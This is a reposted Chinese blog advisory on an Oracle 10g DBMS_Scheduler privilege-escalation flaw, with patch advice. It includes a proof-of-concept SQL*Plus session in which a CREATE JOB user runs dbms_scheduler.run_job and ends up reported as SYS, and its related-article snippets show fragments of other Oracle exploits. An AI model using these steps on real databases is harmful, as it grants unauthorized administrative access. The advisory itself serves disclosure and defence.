oracle10g漏洞,Oracle 10g DBMS_Scheduler权限提升漏洞

最新推荐文章于 2023-03-11 21:00:00 发布
最新推荐文章于 2023-03-11 21:00:00 发布
阅读量229 收藏
点赞数
文章标签: oracle10g漏洞

受影响系统:

Oracle database server 10g

描述:

--------------------------------------------------------------------------------

BUGTRAQ ID: 13509

Oracle是一款大型商用数据库软件。

Oracle在用户访问权限的处理上存在漏洞,攻击者可能利用此漏洞提升权限。

任何拥有CREATE JOB权限的用户都可以通过dbms_scheduler执行数据库任务,从SESSION_USER切换到SYS。这可能导致VPD(虚拟专用数据库)或OLS(Oracle标记)问题,并可能导致权限提升。

链接:

*>

测试方法:

--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性,仅供研究与教学之用。使用者风险自负!

以拥有CREATE job权限的用户连接

SQL> select user from dual;

USER

---------

JOBUSER

SQL> execute dbms_scheduler.run_job('ANY_JOB');

PL/SQL procedure successfully completed.

SQL> select user from dual;

USER

---------

SYS

SQL> select (sys_context('userenv','session_user')) from dual;

USER

---------

SYS

SQL> select (sys_context('userenv','current_user')) from dual;

USER

---------

JOBUSER

SQL> show user

USER is "jobuser"

建议:

--------------------------------------------------------------------------------

厂商补丁:

Oracle

------

目前厂商已经发布了升级补丁以修复这个问题,请到厂商的主页下载10.0.1.4补丁集:

weixin_39638647
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
oracle 漏洞补丁修复,Oracle发布41个安全补丁 修复产品严重漏洞
weixin_32532029的博客
04-03 601
Oracle本次将发布了41个安全补丁,作为季度严重补丁更新(Critical Patch Update,CPU)的一部分。这些补丁修复了它的产品中的十几个严重漏洞。在Oracle对客户的补丁发布预告中说,这次CPU包括Oracle数据库中的十个新的安全漏洞补丁。这些漏洞存在于Job Queue、Oracle OLAP、 Oracle Spatial和Oracle Streams中,影响到Orac...
oracle10漏洞补丁下载,Oracle 10g DBMS_Scheduler权限提升漏洞
weixin_29820757的博客
04-03 291
受影响系统:Oracle database server 10g描述:--------------------------------------------------------------------------------BUGTRAQ ID: 13509 织梦好,好织梦Oracle是一款大型商用数据库软件。织梦好,好织梦Oracle在用户访问权限的处理上存在漏洞,攻击者可能利用此漏洞提升...
oracle漏洞修补,Oracle 1月更新修复多个安全漏洞漏洞
weixin_29612623的博客
04-03 329
Oracle 1月更新修复多个安全漏洞漏洞2007-01-18eNet&Ciweek受影响系统:Oracle E-Business Suite 11i 11.5.7 - 11.5.10 CU2Oracle E-Business Suite 11.0Oracle Enterprise Manager Grid Control 10.2.0.1Oracle Enterprise Manager...
常见网络安全设备:漏洞扫描设备
Spontaneous_0的博客
03-11 203
常见网络安全设备:漏洞扫描设备
oracle数据库的安全测试
hl1293348082的专栏
04-05 342
Oracle Database,又名Oracle RDBMS,或简称Oracle。是甲骨文公司的一款关系数据库管理系统。它是在数据库领域一直处于领先地位的产品。可以说Oracle数据库系统是目前世界上流行的关系数据库管理系统,系统可移植性好、使用方便、功能强,适用于各类大、中、小、微机环境。它是一种高效率、可靠性好的 适应高吞吐量的数据库解决方案。针对Oracle数据库如何测试呢? 检测数据库端口是否开放 这个任务可以使用nmap来对目标IP进行测试,也可以使用其他的端口扫描工具,下面就以nmap为例,
在将DBMS_JOB迁移到DBMS_SCHEDULER时,将Interval值转换为日历日历
04-02
Oracle数据库管理中,DBMS_JOB和DBMS_SCHEDULER是两个重要的后台进程管理包,用于计划和执行数据库任务。DBMS_JOB是较早的版本,而DBMS_SCHEDULER是其现代替代品,提供了更丰富的功能和灵活性。在从DBMS_JOB迁移到...
Oracle jobs(DBMS_JOB and DBMS_SCHEDULER)
07-27
NULL 博文链接:https://wuaner.iteye.com/blog/717793
Oracle10g Job Scheduler
04-02
Oracle 10g Job SchedulerOracle数据库中的一个关键特性,用于自动化执行数据库任务,如维护、备份、数据处理和报告生成。以下是对这个主题的详细解释: **为什么我们需要Scheduler** Oracle 10g Job Scheduler...
Oracle 10g JOB 相关调查修正
07-22
4. **使用DBMS_SCHEDULER**:Oracle 10g引入了更先进的DBMS_SCHEDULER,提供了更多的调度选项和控制。考虑将旧的DBMS_JOB作业迁移到DBMS_SCHEDULER,以利用其增强的功能,如错误处理、依赖管理、资源计划等。 5. **...
oracle10G数据库性能监控与优化详解
08-23
Oracle 10G数据库性能监控与优化是...了解和实践这些监控和优化技巧,能够有效地提升Oracle 10G数据库的性能,确保系统的稳定性和高效运行。在实际操作中,应根据具体业务需求和数据库负载情况进行定制化的调整和优化。
Oracle 10g更改会话整数溢出漏洞
weixin_34348174的博客
08-01 76
Oracle在处理更改会话操作时存在整数溢出漏洞,远程***者可能利用此漏洞在服务器上执行任意指令。仅拥有SELECT权限的用户可以通过提交超长的alter session请求来触发这个漏洞,导致在数据库中执行任意命令。 测试方法: 以仅有CREATE SESSION权限用户的身份连接到数据库。SQL> alter session set events '...
Oracle的多个未明安全漏洞列表一览(转)
08-17 444
Oracle的多个未明安全漏洞列表一览(转)[@more@]Oracle Database是一款商业性质大型数据库系统。 Oracle数据库存在多个缓冲区溢出和拒绝服务问题,远程攻击者可以利用这个漏洞控制数据库或进行拒绝服务攻击...
Oracle数据库口令破解安全漏洞
miki西游 不积跬步,无以至千里;不积小流,无以成江海
11-15 609
在2012年10月,Oracle公司发布一个安全漏洞补丁包,修复漏洞影响到数据库帐号密码的安全,其名称为CVE-2012-3137。它的具体信息是Oracle 10g和11g数据库中使用SHA-1加密算法帐号口令在知道SID和数据库服务器IP的情况下可以被破解,这使得它成了一个重大安全隐患,因此迫切需要修复。 在oracle 11g中,帐号口令默认采用SHA-1加密算法。如果采用DES加密算法...
oracle10g提权,[exploit] Oracle 10G 提权
weixin_34017901的博客
04-11 69
This is slightly modified version of: http://milw0rm.com/exploits/7677This is based on cursor injection and does not need create function privileges:DECLARED NUMBER;BEGIND := DBMS_SQL.OPEN_CURSOR;DBMS...
oracle10g漏洞,Oracle 10g Database DBMS_SCHEDULER远程命令执行漏洞
weixin_30713705的博客
04-09 290
Oracle 10g Database DBMS_SCHEDULER远程命令执行漏洞发布日期:2004-09-02更新日期:2004-09-06受影响系统:Oracle Oracle10g Application Server 9.0.4.0Oracle Oracle10g Application Server 10.1.0.2Oracle Oracle10g Enterprise Edition...
oracle普通用户提权,oracle 10g 漏洞--低权限用户提权方法
weixin_42150745的博客
04-04 504
oracle权限用户提权方法:【漏洞名称】 sys.dbms_export_extension.get_domain_index_metadata 提升权限漏洞【影响平台】Oracle 8i / 9i / 10g / XE【风险等级】高【攻击需求】较低权限账号【造成危害】取得管理员权限【内容描述】oracle Database Server 8.1.7.4, 9.0.1.5, 9.2.0.7,...
oracle10g漏洞修复,Oracle 2008年10月紧急补丁更新修复多个漏洞
weixin_26965807的博客
04-16 657
BUGTRAQ ID: 31683CVE(CAN) ID: CVE-2008-4008,CVE-2008-4009,CVE-2008-4010,CVE-2008-4011,CVE-2008-4012,CVE-2008-4013,CVE-2008-4000,CVE-2008-4001,CVE-2008-4002,CVE-2008-4003,CVE-2008-4004,CVE-2008-3985,C...
oracle10漏洞补丁下载,Oracle漏洞修复工具
weixin_33778479的博客
04-03 1293
Oracle漏洞修复工具是一款专业的Oracle数据库修复扫描工具,当Oracle数据库无法打开的时候,我们可以使用该神器直接读取数据文件然后对其进行解析恢复,软件支持修复因各种原因造成的数据库无法打开或数据库删除后没有备份的问 题,软件侠小编主推下载使用。功能特色不需要运行Oracle数据库软件,EOR直接读取数据库文件解析数据支持ASM,能够直接从ASM磁盘中导出数据,即使相关的磁盘组不能成功...
oracle10漏洞修复,Oracle 2009年10月紧急补丁更新修复多个漏洞
weixin_35028513的博客
04-05 401
安全漏洞:CN-VA09-94发布日期:2009年10月22日漏洞类型:远程执行代码、拒绝服务漏洞评估:严重受影响的软件:* Oracle Database 11g, version 11.1.0.7* Oracle Database 10g Release 2, versions 10.2.0.3, 10.2.0.4* Oracle Database 10g, version 10.1.0.5*...
DBMS_SCHEDULER详细用法
最新发布
06-09
DBMS_SCHEDULEROracle数据库中的一个内置程序包,用于管理和调度作业、程序和链。它是Oracle Scheduler的主要接口,可以通过它来创建、修改和删除作业、程序和链,以及控制它们的执行时间和执行方式。 下面是一些...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值